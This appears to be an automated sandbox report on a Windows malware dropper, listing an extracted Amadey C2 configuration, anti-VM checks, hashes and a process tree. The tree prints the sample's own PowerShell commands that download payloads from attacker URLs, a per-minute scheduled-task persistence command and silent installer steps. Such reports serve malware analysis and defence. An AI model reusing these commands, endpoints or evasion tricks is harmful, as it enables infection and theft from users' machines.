Analysis
-
max time kernel
143s -
max time network
128s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
19-05-2024 18:50
Static task
static1
Behavioral task
behavioral1
Sample
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
Resource
win10v2004-20240426-en
General
-
Target
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe
-
Size
1.8MB
-
MD5
f6986f363dde0d5f374abd0a1dac252b
-
SHA1
4665c53ed2ce6bd84572fc398967d11421e00bab
-
SHA256
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
-
SHA512
733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201
-
SSDEEP
49152:Cl/8HKuLWFBWcz/WrNKnun+YrhLOvn7e:8gLWnWczeNZn1VOf7
Malware Config
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002
Extracted
amadey
4.20
c767c0
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exeaxplons.exeaxplons.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid Process 19 3876 powershell.exe 22 1276 powershell.exe 23 1276 powershell.exe 25 4812 powershell.exe 26 4812 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
axplons.exe3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exeaxplons.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe -
Executes dropped EXE 10 IoCs
Processes:
axplons.exeNewoff.exevpn-1002.exelumma1234.exei0.exei0.tmpaxplons.exeNewoff.exeNewoff.exeaxplons.exepid Process 4444 axplons.exe 4840 Newoff.exe 2968 vpn-1002.exe 2056 lumma1234.exe 4740 i0.exe 5020 i0.tmp 1112 axplons.exe 4540 Newoff.exe 4204 Newoff.exe 1556 axplons.exe -
Identifies Wine through registry keys 2 TTPs 4 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
axplons.exeaxplons.exeaxplons.exe3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-1230210488-3096403634-4129516247-1000\Software\Wine 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe -
Loads dropped DLL 1 IoCs
Processes:
vpn-1002.exepid Process 2968 vpn-1002.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 3 checkip.amazonaws.com 27 checkip.amazonaws.com -
Drops file in System32 directory 1 IoCs
Processes:
i0.tmpdescription ioc Process File created C:\Windows\system32\shlwapi_p.dll i0.tmp -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exeaxplons.exeaxplons.exepid Process 1876 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 4444 axplons.exe 1112 axplons.exe 1556 axplons.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
lumma1234.exedescription pid Process procid_target PID 2056 set thread context of 4776 2056 lumma1234.exe 88 -
Drops file in Program Files directory 15 IoCs
Processes:
chrome.exei0.tmpdescription ioc Process File created C:\Program Files\scoped_dir3048_1233145289\extension.zip chrome.exe File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml i0.tmp File created C:\Program Files\Online Security\unins000.dat i0.tmp File created C:\Program Files\Online Security\is-98D24.tmp i0.tmp File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest i0.tmp File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx i0.tmp File opened for modification C:\Program Files\Online Security\unins000.dat i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest i0.tmp -
Drops file in Windows directory 1 IoCs
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exedescription ioc Process File created C:\Windows\Tasks\axplons.job 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe -
Processes:
powershell.exepowershell.exepowershell.exepid Process 3876 powershell.exe 1276 powershell.exe 4812 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid Process 1592 taskkill.exe 4388 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exepowershell.exepowershell.exepowershell.exeaxplons.exeaxplons.exepid Process 1876 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 1876 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 4444 axplons.exe 4444 axplons.exe 3876 powershell.exe 3876 powershell.exe 1276 powershell.exe 1276 powershell.exe 4812 powershell.exe 4812 powershell.exe 1112 axplons.exe 1112 axplons.exe 1556 axplons.exe 1556 axplons.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exetaskkill.exetaskkill.exedescription pid Process Token: SeDebugPrivilege 3876 powershell.exe Token: SeDebugPrivilege 1276 powershell.exe Token: SeDebugPrivilege 4812 powershell.exe Token: SeDebugPrivilege 1592 taskkill.exe Token: SeDebugPrivilege 4388 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
i0.tmppid Process 5020 i0.tmp -
Suspicious use of WriteProcessMemory 56 IoCs
Processes:
3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exeaxplons.exeNewoff.exelumma1234.exevpn-1002.execmd.exei0.exei0.tmpcmd.exechrome.exedescription pid Process procid_target PID 1876 wrote to memory of 4444 1876 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 81 PID 1876 wrote to memory of 4444 1876 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 81 PID 1876 wrote to memory of 4444 1876 3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe 81 PID 4444 wrote to memory of 4840 4444 axplons.exe 82 PID 4444 wrote to memory of 4840 4444 axplons.exe 82 PID 4444 wrote to memory of 4840 4444 axplons.exe 82 PID 4840 wrote to memory of 2608 4840 Newoff.exe 83 PID 4840 wrote to memory of 2608 4840 Newoff.exe 83 PID 4840 wrote to memory of 2608 4840 Newoff.exe 83 PID 4840 wrote to memory of 2968 4840 Newoff.exe 85 PID 4840 wrote to memory of 2968 4840 Newoff.exe 85 PID 4840 wrote to memory of 2968 4840 Newoff.exe 85 PID 4444 wrote to memory of 2056 4444 axplons.exe 86 PID 4444 wrote to memory of 2056 4444 axplons.exe 86 PID 4444 wrote to memory of 2056 4444 axplons.exe 86 PID 2056 wrote to memory of 4776 2056 lumma1234.exe 88 PID 2056 wrote to memory of 4776 2056 lumma1234.exe 88 PID 2056 wrote to memory of 4776 2056 lumma1234.exe 88 PID 2056 wrote to memory of 4776 2056 lumma1234.exe 88 PID 2056 wrote to memory of 4776 2056 lumma1234.exe 88 PID 2056 wrote to memory of 4776 2056 lumma1234.exe 88 PID 2056 wrote to memory of 4776 2056 lumma1234.exe 88 PID 2056 wrote to memory of 4776 2056 lumma1234.exe 88 PID 2056 wrote to memory of 4776 2056 lumma1234.exe 88 PID 2968 wrote to memory of 5072 2968 vpn-1002.exe 89 PID 2968 wrote to memory of 5072 2968 vpn-1002.exe 89 PID 2968 wrote to memory of 5072 2968 vpn-1002.exe 89 PID 5072 wrote to memory of 3876 5072 cmd.exe 91 PID 5072 wrote to memory of 3876 5072 cmd.exe 91 PID 5072 wrote to memory of 3876 5072 cmd.exe 91 PID 5072 wrote to memory of 1276 5072 cmd.exe 92 PID 5072 wrote to memory of 1276 5072 cmd.exe 92 PID 5072 wrote to memory of 1276 5072 cmd.exe 92 PID 5072 wrote to memory of 4740 5072 cmd.exe 93 PID 5072 wrote to memory of 4740 5072 cmd.exe 93 PID 5072 wrote to memory of 4740 5072 cmd.exe 93 PID 5072 wrote to memory of 4812 5072 cmd.exe 94 PID 5072 wrote to memory of 4812 5072 cmd.exe 94 PID 5072 wrote to memory of 4812 5072 cmd.exe 94 PID 4740 wrote to memory of 5020 4740 i0.exe 95 PID 4740 wrote to memory of 5020 4740 i0.exe 95 PID 4740 wrote to memory of 5020 4740 i0.exe 95 PID 5020 wrote to memory of 4908 5020 i0.tmp 96 PID 5020 wrote to memory of 4908 5020 i0.tmp 96 PID 4908 wrote to memory of 3048 4908 cmd.exe 98 PID 4908 wrote to memory of 3048 4908 cmd.exe 98 PID 3048 wrote to memory of 4120 3048 chrome.exe 99 PID 3048 wrote to memory of 4120 3048 chrome.exe 99 PID 5020 wrote to memory of 1436 5020 i0.tmp 100 PID 5020 wrote to memory of 1436 5020 i0.tmp 100 PID 5020 wrote to memory of 3876 5020 i0.tmp 102 PID 5020 wrote to memory of 3876 5020 i0.tmp 102 PID 5020 wrote to memory of 1592 5020 i0.tmp 104 PID 5020 wrote to memory of 1592 5020 i0.tmp 104 PID 5020 wrote to memory of 4388 5020 i0.tmp 107 PID 5020 wrote to memory of 4388 5020 i0.tmp 107
Processes
-
C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"C:\Users\Admin\AppData\Local\Temp\3a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4444 -
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe" /F4⤵
- Creates scheduled task(s)
PID:2608
-
-
C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"C:\Users\Admin\AppData\Local\Temp\1000271001\vpn-1002.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsu45F4.tmp\abc.bat"5⤵
- Suspicious use of WriteProcessMemory
PID:5072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002','i0.exe')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
C:\Users\Admin\AppData\Local\Temp\i0.exei0.exe /verysilent /sub=10006⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4740 -
C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp"C:\Users\Admin\AppData\Local\Temp\is-GHKM8.tmp\i0.tmp" /SL5="$A00D4,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=10007⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5020 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj > "C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\~execwithresult.txt""8⤵
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\rolnzj9⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:3048 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x108,0x10c,0x110,0xe0,0x114,0x7ffd7d89ab58,0x7ffd7d89ab68,0x7ffd7d89ab7810⤵PID:4120
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\rolnzj.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\~execwithresult.txt""8⤵PID:1436
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\zpksee > "C:\Users\Admin\AppData\Local\Temp\is-G4P48.tmp\~execwithresult.txt""8⤵PID:3876
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "msedge.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "chrome.exe"8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4388
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"C:\Users\Admin\AppData\Local\Temp\1000067001\lumma1234.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2056 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:4776
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1112
-
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exeC:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe1⤵
- Executes dropped EXE
PID:4540
-
C:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exeC:\Users\Admin\AppData\Local\Temp\1000066001\Newoff.exe1⤵
- Executes dropped EXE
PID:4204
-
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exeC:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1556
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c0636f2d138baca01dbb2eedb99bf3d5
SHA13b927899db0f3e2cb510782592887dc02fc3e400
SHA25610973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a
SHA5120187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d
-
Filesize
16KB
MD513d99395f836e90ab15870caeac6e021
SHA1caeea03a0cbe4379808b222e8d1fdcb3bad7b7ea
SHA25636c1000aa1bbfcbed584f15859d849c90b59f0b5cde50e0ab788fb3b18544cde
SHA512cfa9fdcea3b80b9c4a456c36ca6193b44b15118711b54103a52f2d2563cc5df7b355709ca1fd66d3004e4e4434978405131c847bdc50320c8ed6643a4cfa725e
-
Filesize
16KB
MD5593f1d44c3adf97dda30f5b56d795ccb
SHA146e1a340ec4865edbd1bdd3c12f8cae3df56531f
SHA2567fb55495cbb34ddb0a78d748031a71974b47627f89c9c580c8a32c3554d170d0
SHA5129b1dcf49358685814d72ff802c6833467053e6c342fb388709960515fafc7c89f778f1079bdc6d05df86d2abf0c9fb3372891511273d9c5f3e90c247d3be5483
-
Filesize
418KB
MD50099a99f5ffb3c3ae78af0084136fab3
SHA10205a065728a9ec1133e8a372b1e3864df776e8c
SHA256919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA5125ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
-
Filesize
518KB
MD5c4ffab152141150528716daa608d5b92
SHA1a48d3aecc0e986b6c4369b9d4cfffb08b53aed89
SHA256c28de1802bdbcf51c88cd1a4ac5c1decb0558fa213d83833cf5dbd990b9ae475
SHA512a225e98f2bc27e2add9d34bd850e0e66a27bd1db757c979639a636a6efe412e638025c6e235c36188a24c9af2bde4b17d1dbaa0707dce11411402cd5de8024e9
-
Filesize
49KB
MD5ccb630a81a660920182d1c74b8db7519
SHA17bd1f7855722a82621b30dd96a651f22f7b0bf8a
SHA256a73dc535324b73ab10c09ed2b965fc1b504a828f6059ddf99e26b9c03642a346
SHA5128fd536da55b8e2a514bcea9cbe62492af1168b7713ea5955f3af8fcfa8060eac4ee079022380ab5ba5f9f7610a595981ed2f472fb14d569ac82057c50a785811
-
Filesize
1.8MB
MD5f6986f363dde0d5f374abd0a1dac252b
SHA14665c53ed2ce6bd84572fc398967d11421e00bab
SHA2563a1d7b3104e74006ff71fbbc23d83da87aae8c62556aeb24b8929f61bc4031fb
SHA512733a36f1d2f37aee1fa94ad6e60850f2e6adfbdc4c4e418d204f0fe2b2a9590ed5aa6fb5258f8f1883680dee3835f97bceee83b87f7cc0f58a97a82f38b63201
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.5MB
MD5b80362872ea704846e892f16aab924c3
SHA1222b36b97d7978929c6fd2d3b1ff8bd8504a5a33
SHA256d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e
SHA512beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5
-
Filesize
47KB
MD552311257a997455c0a32e1679e0b614e
SHA1395c475df7403e12651c8b6b1d52c33e5d7f3320
SHA25650a78e3d21eea2c5a784eca08d5b4b0f2e4684fe8194a5bf0304c8ca6b18bddd
SHA51219488ccb7d6cbf5e33ab492bd23bcdcd2edaa739ee808c4c5337fb27a0eb4e2632f2af6b2c8546127e20ac2d7a9cd94ffaa833d404fba0ab11ef7e0b301268a0
-
Filesize
208B
MD5963fb7657217be957d7d4732d892e55c
SHA1593578a69d1044a896eb8ec2da856e94d359ef6b
SHA2561d4a8c5e18d7a189036f1074ffae7927b0450864f5c8622a44205e04ef13ce12
SHA512f875fa56bcda6299681d2ca2852d5ae04504b1df8d8824170215d4c136a568fc2548ada88ea75178ce23b4649f1713a863926c4d02125cb29475251bf5781fdd
-
Filesize
43KB
MD511a38af0ad330d95d2fb709612a44fa5
SHA1bc173e51491e8ddbd88d35d03a88d91e47f4dc54
SHA2560d82a391c8676e5bc07f7e91da281ad338a9cea8130f4ee81949fa418cc19970
SHA5124bc5d99e14892b5f88ea15da5b6d02cd8131bf25e2990cdc1f88accca2cb984a547e58ac850fe15323d4a5752e0194ecea73acfb2cbab6769ac06e9002d4bad9
-
Filesize
49KB
MD5fab1b24e1511a8b3d4a8a5ac05dd04c3
SHA16b417668f3424c1dcce5a4da6fadeeb4ac1fefae
SHA256ee424504b89f6891df070a9647d254caa0b98513698109cd3d4494d7f5a46f1a
SHA512647ea4a5758f7d9bc2a9b75c061240f0ba229376e90f5b286727aede140e9459eee6c5357aae3a15520dd502341b1176cdc6a6f7d30f5878ebd8880607734b29
-
Filesize
1KB
MD59ad34d7fdf00b4ebb8c749e7ed6d1470
SHA1d25a60b321dde2cc2dee4ab4466f5b5730bc8b5c
SHA256420cea2f781a79e4298fe0801ba274cceb605ebf80cca32c89a76e15d70690f8
SHA512fc300831a2dc4c9fa5926b0270e17c2e0f5e6eeac57eb424e0dc4cac3b2f2ab799393eac43dc027dcf43cfdba7bbd342dce37786e12922d24c70ea19a3ca3dad
-
Filesize
8KB
MD5d57a101cf48bd00b5297596c081ece42
SHA147be9ca3d2a57788957bb6f91d9a6886c4252c0f
SHA256a47dfbb6b7b40189b6cbed618537292e8e447bf376d37b34c4b38e87bf398bf5
SHA5127110cf64ee0cabe13d49a31b84e5efecee89acb393cceff1d5ab9f18a2fbcd7930008fbcfe94b5324d35b90ce7102dcb62e14f81614dd579a64ba4ba8d339eb5
-
Filesize
3KB
MD5ca00972a17d51a3e6a28cfc8711474e4
SHA1c806ba3bcfb0b785aa4804843d332f425c66b7e0
SHA256fb5b73939e6a24b68f5780168cbef56c520a95c86b3daf0d6ae3fd6f70ead1aa
SHA5129731e6e583fdcb148f3ed46daa1749a8217124541f2f925b10692100488e30ab50bf6e212b9a4a335d25c673381b11604ddb72830d502589d431342685277516
-
Filesize
108KB
MD5432c4c1300ba1c077fbd681f9667a104
SHA133482cd9df3a5ae20ad7f978f51bd35d2453c9ba
SHA256adeb84b81042b094ffcfd21ca8c8c33b1a031ef02dc6a64604393197ff075f04
SHA5120ab8f623e52550e8c06b385080cbfbe5377d0d718094d2c9436d910b17d86f9dcc4c722da419705604f38d26cdd0b524ef64d27abc58a66c9b24b660275cd2ad
-
Filesize
438B
MD51d47eb945d1299c0e53bcada476d32b3
SHA1509f9041f7e2a14402915feb4f2a739cfac5636b
SHA2560a40fc9c57498f6fa92f5d52688f3cf55ecc607d7d91be7997412105def9278a
SHA5126d20d3855225ee48373ee1ae19d5cecf90951a507c9c1d23d86fe0bb4f73def9545f0fd18ce821a3d63fa636b06d08a52a41c0f3a3cb2edc20d8ef92919b4258
-
Filesize
48KB
MD54cac70c3fdb075424b58b220b4835c09
SHA1651e43187c41994fd8f58f11d8011c4064388c89
SHA2564094f54853d9eea9fb628e2207cd95042bae089711908d1c8ed189fad9448e2b
SHA512810e97be3d47c67449a6049b52578f4f8dd829b62d015dde39c2a2381c481625540f945e06224b9c74e0deac089f6cd352f53343170138778c1f9e62e7518963
-
Filesize
3.1MB
MD5bdf5432c7470916ab3c25f031c4c8d76
SHA14762eeae811cfad7449a3d13fb1d759932c6d764
SHA25672f7dbc5502cfce6de9184df4466a84fbbaa828048a183b0eb1690e79c886903
SHA51233ff33582f75a67602233860d3057122a4f893d3ec3b58204617660ec46d1afd25657047f364c06f727e1604907e9cb740dc847b992249d0656100308c4bedde
-
Filesize
25KB
MD540d7eca32b2f4d29db98715dd45bfac5
SHA1124df3f617f562e46095776454e1c0c7bb791cc7
SHA25685e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA5125fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d
-
Filesize
735B
MD5f79d850a439815f276773a85f654511d
SHA142c4b202b7122ce48bb17975cf0a5be337d09fec
SHA25631b4234965ffbff8d8a2d9dc8876d2edb1ba4eb44f482fedad5ed16284f872ff
